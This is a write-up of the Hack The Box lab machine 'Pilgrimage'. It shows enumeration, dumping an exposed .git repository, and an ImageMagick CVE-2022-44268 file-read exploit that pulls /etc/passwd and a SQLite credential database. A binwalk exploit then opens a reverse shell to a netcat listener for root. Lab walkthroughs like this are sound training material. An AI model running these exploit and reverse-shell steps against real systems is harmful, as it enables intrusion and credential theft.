HTB: Pilgrimage

included in HTB CTF

15 Apr 2024 4 minutes

Contents

Easy HTB machine where a website is used to reduce the size of images. Then an Image Magick exploit is used for file read vulnerability. Though that the SQLite3 database can be enumerated.

Enumeration

nmap shots port 22 and port 80 open.

            
                
                        
                            
$ nmap -sC -sV -oN nmap/default_ports -v 10.10.11.219
Nmap scan report for 10.10.11.219
Host is up (0.029s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 20:be:60:d2:95:f6:28:c1:b7:e9:e8:17:06:f1:68:f3 (RSA)
|   256 0e:b6:a6:a8:c9:9b:41:73:74:6e:70:18:0d:5f:e0:af (ECDSA)
|_  256 d1:4e:29:3c:70:86:69:b4:d7:2c:c8:0b:48:6e:98:04 (ED25519)
80/tcp open  http    nginx 1.18.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://pilgrimage.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

                        
                    

            
        

Next to this scan that checks the default ports, I also run a port scan on all ports using -p- to make sure I don’t miss anything. The results from this were the same.

I add the following line in my /etc/hosts file 10.10.11.219 pilgrimage.htb

And the following website shows

I can register for an account

I can upload a file and shrink it, after which I receive a long URL to the shrunken file.

Let’s test if I can upload a malicious php reverse shell or web shell.
No luck after testing if I can upload a malicious php web shell.

I turn back and enumerate the box again, maybe I missed something. And yes, did I miss something, after the initial enumeration, i added pilgrimage.htb to my /etc/hosts file, but nmap couldn’t run other scripts against the domain. So i re-ran the nmap scan on port 80 and this time it also showed http-git

            
http-git: 
|   10.10.11.219:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Pilgrimage image shrinking service initial commit. # Please ...

Great, now I can use gitdump to see all the files.

GitDump

            
$ python3 ~/github/GitDump/git-dump.py http://pilgrimage.htb/.git/
URL for test: http://pilgrimage.htb/.git/
Fetching: http://pilgrimage.htb/.git/index
Fetching: http://pilgrimage.htb/.git/FETCH_HEAD
Fetching: http://pilgrimage.htb/.git/HEAD
Fetching: http://pilgrimage.htb/.git/ORIG_HEAD
Fetching: http://pilgrimage.htb/.git/config
Fetching: http://pilgrimage.htb/.git/description
Fetching: http://pilgrimage.htb/.git/packed-refs
Fetching: http://pilgrimage.htb/.git/info/exclude
Fetching: http://pilgrimage.htb/.git/info/refs
Fetching: http://pilgrimage.htb/.git/logs/HEAD

Script Executed Successfully
Run following command to retrieve source code: cd output && git checkout -- .

And I end up with all these files:

Shell as Emily

It uses ImageMagick to parse the files, it uses version 7.1.0-49

A quick google gets me to a github page with an exploit for CVE-2022-44268.

I first generate a malicous png file

            
$ python3 exploit.py -f "/etc/passwd" -o exploit.png

   [>] ImageMagick LFI PoC - by Sybil Scan Research 
   [>] Generating Blank PNG
   [>] Blank PNG generated
   [>] Placing Payload to read /etc/passwd
   [>] PoC PNG generated > exploit.png

I then upload that file via the webinterface, so it gets compressed using imagemagick and then download the result again.

I then use the imagemagick from the git repository (the same that is being used on the live server) to identify the result


$ ./magick identify -verbose result.png

From there I copy the Raw profile type, and paste it in the following snipped

            
python3 -c 'print(bytes.fromhex("726f6f743a783a726f6f743---REDACTED--").decode("utf-8"))'

It then dumps all the /etc/passwd data! great, I could ofcourse read the users flag this way, but I want to do it via a shell session.

Now the question, what files do I want to read…
After I looked through the git files again, especially the register.php I noticed the following code snippet that shows where our username and passwords are being saved. Lets try to read this via the vulnerability.

After doing the same process as before, but now with /var/db/pilgrimage i ended up witha gigantic hex file that I somehow need to parse to sqlite.

I found the following stackoverflow question where it explains how I can transform the hex to binary again, so I can read it via sqlite.
xxd -r -p db_raw_oneline.hx db.bin

I now run this file via sqlite3 db.bin, since I am unfamiliar with the syntax, I checkout this quick and easy guide. And there we have a password for emily, as you might remember, emily was also in the /etc/passwd dump.

And I successfully login!

            
emily@pilgrimage:~$ cat user.txt 
8a728138955c0718*************

Shell as root

Running ps aux shows a process malwarescan.sh that is not normal

Containing the following code

It uses binwalk in the code, I check the version in order to see if there is anything that can be exploited.

Google gave me the following exploit db post

Using the exploit, I had to put the generated file in /var/www/pilgrimage.htb/shrunk, since that is where the malwarescan.sh checks the files.

            
emily@pilgrimage:/var/www/pilgrimage.htb/shrunk$ python3 ~/.a/exploit.py  ~/.a/cat.jpeg 10.10.14.52 5555

After that I listen via nc, and succesfully get a shell as root.

            
$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.52] from (UNKNOWN) [10.10.11.219] 43648

whoami
root
cd /root
ls
quarantine
reset.sh
root.txt
cat root.txt
2d852eac9af3249d089**********